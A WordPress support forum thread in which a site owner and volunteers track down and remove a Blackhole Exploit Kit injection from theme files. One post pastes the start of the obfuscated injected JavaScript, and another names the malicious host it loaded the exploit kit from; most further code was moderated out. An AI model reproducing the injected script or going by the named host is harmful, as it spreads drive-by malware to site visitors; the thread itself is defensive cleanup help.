Ready to get started?Download WordPress


Blackhole Exploit Kit in my site, no clue about how to remove it (22 posts)

  1. Dirtysoundwavess
    Posted 2 years ago #

    So the problems with Blackhole Exploit Kit have shown up again, after a week of no signs. Visitors have sent me messages about the warnings they got, and I have no clue how to clean the site. I checked Htlacess file as well as style.css and found nothing that I would suspect.

    Noticed also that the virus often shows up in category pages.

    I run all the latest, updated timbthumb and etc. Don't know if there is any more info you need for to track the virus?

    Site: Dirtysoundwaves.net ( can be risky, even though I visit it everyday)

  2. Dirtysoundwavess
    Posted 2 years ago #

    here is the results from AVG
    The black hole exploits seems to be pretty active, but not the Javascript malware.

  3. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

  4. Dirtysoundwavess
    Posted 2 years ago #

    Thanks kmessinger, I've already checked them out. NOTHING says how to find blackhole exploits, that's all I want to know. Then I can use your links for to clean the site.

  5. gadi.AV
    Posted 2 years ago #

    Hi DSW,
    I have an intrest in your case, can you please send me a link to your pages ( specifically one which were reported as malicious)
    Can you please let me know how did users know they were attacked by blackhole?


  6. Johannes96
    Posted 2 years ago #

    Hello gadi.AV, lost my previous account which I posted this topic with. So I'm using this one instead.

    Must say that I'm thankful for your interest in helping me!

    The problems when users got blocked or warned about my site started about 3 weeks ago, so I took the case in another forum. After some the black hole exploit kit doesn't show all the time (attacking pcs) so did they recomend me to remove the category page, where they found suspected javascript.

    </div></div> </aside> <!--End Sidebar--> </div> <!--End Container-->
    <script type="text/javascript">if('PRgB'=='WIXmQj')eHKuj='ESlJVV';if('KyvNR'=='SETEu')fmxLG();var zSLLL=256;if('Achu'=='sMjaGB')XiGL='ZPjAu';var hv .

    So I did remove the category and fixed the treath according to AVG.

    The result from AVG can be found here (Link) As you see the Javascript treath hasn't been reported for 30 days.

    What's remaining though is the Blackhole Exploit Kit, which is still active. And that's the problem, I have only met the virus once. And it was reported as Trojan, a window with false Antivirus tried to install in my computer. So I'm not really sure what it really is!
    Here is a screen shot of Avast reporting iframe as threath.
    Also my broswer (Opera) blocks often my site.

    here is what 28 other webscanners show - https://www.virustotal.com/url/32cbf5296b07dd220d572de32b4432d464e48075a42fc56a77627995eb2e88a9/analysis/1340703454/

    You are apparently the only one who can help me.

  7. gadi.AV
    Posted 2 years ago #

    I still see a malicious script on the site just before the end inner tag.
    The script is called from : Referer: dirtysoundwaves(dot)net/category/house-music/ ( don't go there)
    and calls an exploit kit from minussqlite(dot)biz ( don't go there :)
    might be other URLs as well in such an attack.

    [ code removed - use pastebin instead ]

  8. gadi.AV
    Posted 2 years ago #

    A Link to the code snippet which is injected:

  9. Johannes96
    Posted 2 years ago #

    Hmm, might it's that script. But I've been trying to figure out how to find the script in ''End inner tag''.

  10. gadi.AV
    Posted 2 years ago #

    Can help you there, I am no wordpress expert.

  11. cjchamberland
    Posted 2 years ago #

    Look at your theme's index.php, footer.php and functions.php files. See if there is any strange code at the bottom of the index.php, or at the top of your footer.php file. Or they may have a function that they placed in your functions.php file that is getting called in the footer. Typically it will start out with "eval(base64...."

  12. Johannes96
    Posted 2 years ago #

    This is the closest code i found

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

    Or this one


    Not sure if it's right, but I'm really bad at finding harmful codes. All looks the same for me.

  13. Johannes96
    Posted 2 years ago #

    I'm actually ready to give admin access joust to get rid of the malware.
    So if there is any good hearted ones, please!

  14. redleg-too
    Posted 2 years ago #

    The code you have listed above is malicious.

  15. gadi.AV
    Posted 2 years ago #

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

  16. Johannes96
    Posted 2 years ago #

    Wow, never thought I would find it.
    Next step would be to remove the codes, I guess?

    Copied whole code, don't know where to remove

    [Code moderated as per the Forum Rules. The maximum number of lines of code that you can post in these forums is ten lines. Please use the pastebin]

  17. Johannes96
    Posted 2 years ago #


    Well here is the code on pastebin



    How can I remove the codes?

  18. esmi
    Forum Moderator
    Posted 2 years ago #

    Please refer to the links posted near the top of this topic.

  19. cjchamberland
    Posted 2 years ago #

    just remove everything below the

    <?php include TEMPLATEPATH . '/banner-bottom.php'; ?>

  20. Johannes96
    Posted 2 years ago #

    I think it's gone, removed both from footer and index. And the site works.

    Now how can I check if the site is clean?
    AVG shows only result from reports by their users.

  21. pbut
    Posted 2 years ago #

    i am using the Imbalance theme and my website - http://www.pierrotphoto.co.uk went live about four weeks ago. Over the last two days one of my American friends have said that she can't access one of my categories/page - Cromer fancy dress because its being blocked by her anti virus. She is accessing it via a link i have on facebook (which is my web address that I typed in as - http://www.pierrotphoto.co.uk) Currently she is the only person who has informed me of this problem - have had over a 1000 page views.
    I trust her judgment and I am NOT a wordpress expert - self taught and a struggler!!
    I have tried to follow the discussion above but uncertain what to look for in the index, footer and header. No indication of
    Any help. guidance will be of great interest.
    When the US wakes up - i will try and find out the anti virus. She is using AVG free version
    Just spoken to her - the issue appears to eminate from the typed link i have in my facebook - Pierre Butikofer
    All other access appear to work - ie directly or via twitter

    Any help will be gratefully accepted. Hope I have been relatively clear


    Pierre Butikofer

  22. Dirtysoundwavess
    Posted 1 year ago #

    Hi Pierra, I*m happy to help. According to AVG, your site should be pretty safe?

Topic Closed

This topic has been closed to new replies.

About this Topic